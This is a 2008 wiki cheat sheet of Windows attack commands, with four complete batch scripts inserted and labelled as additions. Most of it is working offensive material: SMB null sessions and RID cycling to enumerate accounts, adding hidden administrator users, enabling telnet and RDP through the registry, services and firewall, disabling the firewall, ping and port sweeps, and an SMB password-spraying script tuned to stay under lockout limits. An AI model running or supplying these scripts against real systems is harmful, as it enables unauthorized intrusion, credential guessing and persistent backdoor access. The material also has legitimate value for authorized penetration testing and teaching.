Difference between revisions of "Windows Commands"
Revision as of 14:44, 18 July 2008
Recon
nslookup
- Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV
nslookup <site>
- Interactive mode (ls -d asks the server for a zone transfer, which most servers refuse):
nslookup
> [name or ip]
> server [server ip]
> set type=any
> ls -d [target_domain] [> filename]
> view [filename]
- No recurse:
> set norecurse
> set recurse
Scanning
tracert
Parameters
- -d -- don't resolve names
- -h <N> -- max number of hops (default 30)
- -j <hostlist> -- use loose source routing
- -w <N> -- wait for Nms before timing out (default 4000)
SMB session
Establishing a null session (anonymous; newer Windows restricts what a null session may enumerate, so expect it to fail or return little)
net use \\<target> "" /u:""
Establishing an authenticated session
net use \\<target> <password> /u:<username>
Mount a share (* takes the next free drive letter; c$ is the administrative share and needs admin rights on the target)
net use * \\<target>\<share> <password> /u:<username>
net use * \\<target>\<share> <password> /u:<machinename>\<username>
net use * \\<target>\c$ <password> /u:<username>
Dropping SMB sessions (Windows allows one set of credentials per server, error 1219, so drop the old session before connecting as someone else)
net use \\<target> /del
Dropping all SMB sessions (bad idea: it also drops every mapped drive on the box you are typing on)
net use * /del
Pulling credentials (w/ SMB session)
Enumerating users (-U) and groups (-G) over the session
enum -U <target>
enum -G <target>
user2sid
- Outputs in the form S-X-Y-target_sid-RID
user2sid \\<target> <machine_name>
sid2user
- Requires spaces instead of dashes and drops the leading S-1: S-1-5-21-a-b-c-500 becomes 5 21 a b c 500
sid2user \\<target> 5 <target_sid> <N>
for /L %i in (1000, 1, 1050) do @sid2user \\<target> 5 <target_sid> %i
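The RID loop above, as an added example that is not part of the original page: a batch file that takes the SID exactly as user2sid prints it, strips the RID, does the dash-to-space conversion sid2user needs and walks a RID range. It assumes an SMB session to the target already exists and that sid2user.exe is on PATH; the RID range defaults are the page's 1000-1050.

```batch
@echo off
REM ridcycle.bat: added example, not part of the original page.
REM Usage: ridcycle.bat <target> <S-1-5-21-a-b-c-RID> [start] [stop]
REM Assumes a null or authenticated session to <target> and sid2user.exe on PATH.
setlocal
if "%~2"=="" (
    echo usage: %~nx0 ^<target^> ^<S-1-5-21-...^> [start] [stop]
    exit /b 1
)
set "target=%~1"
set "sid=%~2"
set "start=%~3"
set "stop=%~4"
if not defined start set "start=1000"
if not defined stop set "stop=1050"

REM Only account SIDs of the S-1-5-21-... form make sense here.
echo %sid% | findstr /B /L /C:"S-1-5-21-" >nul || (
    echo [-] not an account SID: %sid%
    exit /b 1
)

REM "S-1-5-21-a-b-c-500" -> "S 1 5 21 a b c 500"; tokens 3-7 are "5 21 a b c",
REM i.e. the "5 <target_sid>" part of the sid2user command line.
set "spaced=%sid:-= %"
for /F "tokens=3-7" %%a in ("%spaced%") do set "prefix=%%a %%b %%c %%d %%e"

echo [*] resolving RIDs on \\%target% with prefix "%prefix%"
REM RID 500 is the built-in Administrator and 501 the Guest, whatever they were renamed to.
for %%r in (500 501) do (
    echo --- RID %%r
    sid2user \\%target% %prefix% %%r
)
for /L %%r in (%start%,1,%stop%) do (
    echo --- RID %%r
    sid2user \\%target% %prefix% %%r
)
endlocal
```

Run it as `ridcycle.bat <target> S-1-5-21-a-b-c-500 1000 1100`; resolving RID 500 first gives you the real name of the administrator account even when it has been renamed.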
Exploitation
Finding client-side programs
dir /s "c:\Program Files"
dir /s /b "c:\Program Files\*.exe"
Service interaction
List running services
sc query
List all services
sc query state= all
List all service names
sc query state= all | find "SERVICE_NAME"
Query service information
sc query <servicename>
sc qc <servicename>
Start a service (the space after start= is required; sc reads "start=" as the option name)
sc config <servicename> start= demand
sc start <servicename>
Starting telnet
sc query tlntsvr
sc config tlntsvr start= demand
sc start tlntsvr
Starting terminal services
sc query termservice
sc config termservice start= demand
sc start termservice
Variables
Finding environmental variables
set
Finding a specific variable (set <prefix> lists every variable whose name starts with the prefix)
set <variable>
echo %<variable>%
set username
set path
set systemroot
echo %systemroot%
cd %systemroot%
Users and groups
Listing users
net user
Creating a user
net user <username> <password> /add
Listing groups
net localgroup
Creating a group
net localgroup <groupname> /add
Adding a user to a group
net localgroup <groupname> <username> /add
Adding a user to the telnet users group
net user <username> <password> /add
net localgroup TelnetClients /add
net localgroup TelnetClients <username> /add
Adding a user to the terminal services group
net localgroup "Remote Desktop Users" <username> /add
List administrators
net localgroup administrators
Add an administrator
net user <username> <password> /add
net localgroup administrators <username> /add
Remove a user from a group
net localgroup <group> <username> /del
Delete a user
net user <username> /del
Firewall interaction
The netsh firewall context below is the XP/2003 one; on Vista/2008 and later it is deprecated and the same things are done under netsh advfirewall firewall.
Help
netsh /?
Show config
netsh firewall show config
Open a specific port
netsh firewall add portopening protocol = <TCP|UDP> port = <port> name = <comment> scope = custom addresses = <address/CIDR>
Remove the port opening
netsh firewall del portopening protocol = <TCP|UDP> port = <port>
Disable the firewall completely (bad idea)
netsh firewall set opmode disable
Opening the firewall for telnet
netsh firewall add portopening protocol = TCP port = 23 name = telnet mode = enable scope = custom addresses = <address>
Opening the firewall for terminal services
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = <address>
Opening the firewall for SSH
netsh firewall add portopening protocol = TCP port = 22 name = sshd mode = enable scope = custom addresses = <address>
Registry interaction
Query a key
reg query <keyname>
Adding a value (append /f to overwrite an existing value without the interactive prompt)
reg add <keyname> /v <valuename> /t <type> /d <data>
Export data
reg export <keyname> <filename.reg>
Import data
reg import <filename.reg>
Enabling terminal services (fDenyTSConnections=0; the value normally already exists, so without /f reg add stops and asks before overwriting it)
reg add "hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0 /f
netstat
Finding a port
netstat -an | find "<port>"
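The registry, service, firewall and netstat steps above strung together, as an added example that is not part of the original page: a batch file that permits Terminal Services connections, makes sure the service is up, opens the firewall for exactly one source address and confirms the listener. It assumes an elevated cmd prompt on the target and the XP/2003 netsh firewall context; the allowed address is the one argument.

```batch
@echo off
REM enable_rdp.bat: added example, not part of the original page.
REM Usage (elevated prompt): enable_rdp.bat <allowed-address>
setlocal
if "%~1"=="" (
    echo usage: %~nx0 ^<allowed-address^>
    exit /b 1
)
set "allowed=%~1"

REM 1. Registry: fDenyTSConnections=0 permits RDP. /f overwrites the existing
REM    value without the overwrite prompt that would otherwise hang the script.
reg add "hklm\system\currentcontrolset\control\terminal server" /v fDenyTSConnections /t REG_DWORD /d 0 /f >nul || (
    echo [-] reg add failed, is this prompt elevated?
    exit /b 1
)

REM 2. Service: manual start, then start it. sc start on a service that is
REM    already running fails with error 1056, which is harmless here.
sc config termservice start= demand >nul
sc start termservice >nul 2>&1
sc query termservice | find "RUNNING" >nul || (
    echo [-] termservice is not running:
    sc query termservice
    exit /b 1
)

REM 3. Firewall: scope the exception to one address instead of opening 3389 to everyone.
netsh firewall set service type = remotedesktop mode = enable scope = custom addresses = %allowed%

REM 4. Verify that something is actually listening on 3389.
netstat -an | find ":3389" | find "LISTENING" >nul && (
    echo [+] RDP listening on 3389, allowed from %allowed%
) || (
    echo [-] nothing listening on 3389
    exit /b 1
)
endlocal
```

On Vista/2008 and later the firewall step is `netsh advfirewall firewall set rule group="remote desktop" new enable=yes remoteip=<address>`; the registry, sc and netstat steps are unchanged.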
ipconfig
Dump the DNS cache
ipconfig /displaydns
arp
Dump the ARP cache
arp -a
Looping
/L loop
for /L %i in (<start>,<step>,<stop>) do <command>
Counting
for /L %i in (1,1,255) do @echo %i
Ping scanning (match "TTL=" rather than "Reply": a router's "Destination host unreachable" message is also a reply)
for /L %i in (1,1,255) do @echo 10.10.10.%i & @ping -n 5 10.10.10.%i | find "TTL="
DNS bruteforce
for /L %i in (1,1,255) do @nslookup 10.10.10.%i 2>nul | find "Name" && echo 10.10.10.%i
/F loop
for /F ["<options>"] %i in (<stuff>) do <command>
Looping through passwords (check the lockout threshold with net accounts first; "delims=" and the quotes keep passwords that contain spaces whole)
for /F "delims=" %i in (password.lst) do @echo %i & @net use \\<target> "%i" /u:<username> 2>nul && pause
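The password loop above with the check a practitioner wants in front of it, as an added example that is not part of the original page: a batch file that reads the lockout threshold from net accounts /domain, refuses to make more attempts than that, keeps passwords with spaces intact and stops at the first success. It assumes the machine you run it from is joined to the domain the account belongs to (net accounts /domain reports that domain's policy, not the target's local one) and that net accounts prints the English "Lockout threshold:" line.

```batch
@echo off
REM spray.bat: added example, not part of the original page.
REM Usage: spray.bat <target> <username> <password.lst>
setlocal enabledelayedexpansion
if "%~3"=="" (
    echo usage: %~nx0 ^<target^> ^<username^> ^<password.lst^>
    exit /b 1
)
set "target=%~1"
set "user=%~2"
set "list=%~3"
if not exist "%list%" (
    echo [-] %list% not found
    exit /b 1
)

REM Third token of "Lockout threshold:   Never" or "Lockout threshold:   5".
REM Assumption: English output, and the domain you are in is the account's domain.
REM If the query fails the threshold stays "Never", so confirm it by hand on
REM a standalone target with net accounts there.
set "threshold=Never"
for /F "tokens=3" %%t in ('net accounts /domain 2^>nul ^| find "Lockout threshold"') do set "threshold=%%t"
echo [*] lockout threshold: %threshold%

REM Only one set of credentials per server is allowed, error 1219, so start clean.
net use \\%target% /del >nul 2>&1

set /a tries=0
set "found="
REM delims= keeps a password that contains spaces as one token.
for /F "usebackq delims=" %%p in ("%list%") do (
    if not defined found (
        if /I not "%threshold%"=="Never" if !tries! GEQ %threshold% (
            echo [x] reached the lockout threshold, stopping
            goto :done
        )
        set /a tries+=1
        net use \\%target% "%%p" /u:%user% >nul 2>&1 && (
            set "found=%%p"
            net use \\%target% /del >nul 2>&1
        )
    )
)
:done
if defined found (
    echo [+] %user%:%found%
) else (
    echo [-] no match after %tries% attempts
)
endlocal
```

A threshold of 5 means the script stops after 5 attempts; if the policy also has a lockout observation window, wait it out before running the next slice of the list.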
Portscanning from a file
for /F %i in (ports.txt) do @nc -n -vv -w3 10.10.10.50 %i
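The /L ping sweep and the /F port scan above combined into one batch file, as an added example that is not part of the original page: it sweeps a /24, writes the live hosts to a file and then tries every port in ports.txt against each of them. It assumes the classic nc.exe build (whose -vv output contains the word "open") is on PATH and that ports.txt holds one port per line; the base network defaults to the page's 10.10.10.

```batch
@echo off
REM sweep.bat: added example, not part of the original page.
REM Usage: sweep.bat [first-three-octets]   e.g. sweep.bat 192.168.1
REM In a .bat file the loop variable is %%i; at the prompt it is %i.
setlocal
set "base=10.10.10"
if not "%~1"=="" set "base=%~1"
set "live=live_hosts.txt"
if exist "%live%" del "%live%"

echo [*] sweeping %base%.1-254
for /L %%i in (1,1,254) do (
    REM TTL= only appears in a real reply. Matching Reply would also catch
    REM the Destination host unreachable message a router sends back.
    ping -n 1 -w 300 %base%.%%i | find "TTL=" >nul && (
        echo     %base%.%%i is up
        >>"%live%" echo %base%.%%i
    )
)

if not exist "%live%" (
    echo [-] no live hosts
    exit /b 1
)
if not exist ports.txt (
    echo [-] ports.txt not found
    exit /b 1
)

echo [*] port scan of live hosts
for /F "usebackq delims=" %%h in ("%live%") do (
    for /F "delims=" %%p in (ports.txt) do (
        REM -z connects without sending data, -w 3 gives up after three seconds,
        REM and nc writes its verbose output to stderr, hence 2^>^&1.
        nc -n -vv -z -w 3 %%h %%p 2>&1 | find "open" >nul && echo     %%h:%%p open
    )
)
endlocal
```

Putting the redirection before the echo (`>>"%live%" echo ...`) avoids cmd misreading a trailing digit of the address as a file handle.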